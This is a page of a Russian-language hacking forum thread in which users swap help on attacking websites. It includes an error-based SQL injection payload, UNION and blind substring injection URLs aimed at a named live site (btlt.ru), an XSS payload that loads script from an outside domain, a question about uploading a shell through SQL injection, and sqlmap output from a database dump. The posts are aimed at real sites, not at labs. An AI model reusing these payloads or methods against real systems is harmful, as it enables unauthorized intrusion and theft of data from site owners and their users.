Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1145 of 1207
  1. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    ага точно.
    а что можно сделать ?
    :(
     
    #22881 imprenko, 29 Dec 2013
  2. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    пароли знаю.
    я насчет шелла возможно как нить залить через скулю?
     
    #22882 imprenko, 29 Dec 2013
  3. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    С чего ты взял что там что-то есть?
     
    #22883 GhostW, 29 Dec 2013
  4. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Вывод ошибки есть.
     
    #22884 Massay, 29 Dec 2013
    Last edited: 30 Dec 2013
  5. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    У меня в браезере что с вашей сессией, что без - кидает на второй скрин, ничего не меняется. Попробуйте выполнить
    <request action="save"><param name="CH_FLAGS">777") and extractvalue(1,concat(1,user()))=("1</param></request>
    Там вероятно update используется, хотя возможно и простая выборка.
     
    #22885 Inoms, 29 Dec 2013
  6. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    DB Error
    You have an error in your SQL syntax;
     
    #22886 Massay, 29 Dec 2013
    Last edited: 30 Dec 2013
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    чем передаешь POST-запросы? Не могу добиться выводы ошибки в Http Analyzer
     
    #22887 er9j6@, 29 Dec 2013
    Last edited: 29 Dec 2013
  8. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    POST запрос передаю через плагин в Мозиле, HackBar.
     
    #22888 Massay, 29 Dec 2013
    Last edited: 30 Dec 2013
    1 person likes this.
  9. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    *Удалено по просьбе автора*
     
    #22889 Inoms, 30 Dec 2013
    Last edited: 30 Dec 2013
  10. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    sqlmap вывел таблици
    только вот кодировка непонятная не могу в нормальный вид вывести
    помогите пожалуйста....
    back-end DBMS: Microsoft Access
    Database:
    [2 tables]
    +--------------------------------------------------------------+
    | {AIP|h3I$0?QE?2§4%H87HFE\n>p |
    | {AIP|\x154%\x12\x11H87H\x1fFE\\n>p |
    +--------------------------------------------------------------+
     
    #22890 imprenko, 30 Dec 2013
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Вставка в параметр или в тело?

    PHP:
    <script/src=//asd.ru></script>
    30 Символов. Если найти 5-буквенный домен, это 29. Может быть как-то еще закрывающий тег можно опустить.

    P.S. Два слэша означают использование протокола сайта(HTTPS при HTTPS и HTTP при HTTP).
     
    #22891 randman, 30 Dec 2013
    2 people like this.
  12. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://www.btlt.ru/comp/index.php?a=p&cat=8 and substring(@@version,1,1)=5

    а дальше никак...!
    окажите помощь!
     
    #22892 Always, 3 Jan 2014
  13. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    так неинтересно!
     
    #22893 Always, 3 Jan 2014
  14. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
     
    #22894 Inoms, 3 Jan 2014
  15. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    но мне тот линк интересен, как его крутануть?!
     
    #22895 Always, 3 Jan 2014
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопросец,

    http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1))
    не дает вывода на страницу, почуму?

    ведь ascii(substring(user(),1,1)) ровняется 116

    так нормальнро выводится
    http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116

    я как-то запрос не так составл?
     
    #22896 qaz, 4 Jan 2014
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    меня интересует именно мой вопрос
     
    #22897 qaz, 4 Jan 2014
  18. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Вызов функций в limit'е ? lol
     
    #22898 Inoms, 4 Jan 2014
  19. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Привет всем, есть инъекция вида
    Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
     
    #22899 Massay, 4 Jan 2014
  20. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.
    Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.
    Или можно что-то сделать с sqlmap?
     
    #22900 Massay, 5 Jan 2014
    Last edited: 5 Jan 2014
(You must log in or sign up to post here.)
Page 1145 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.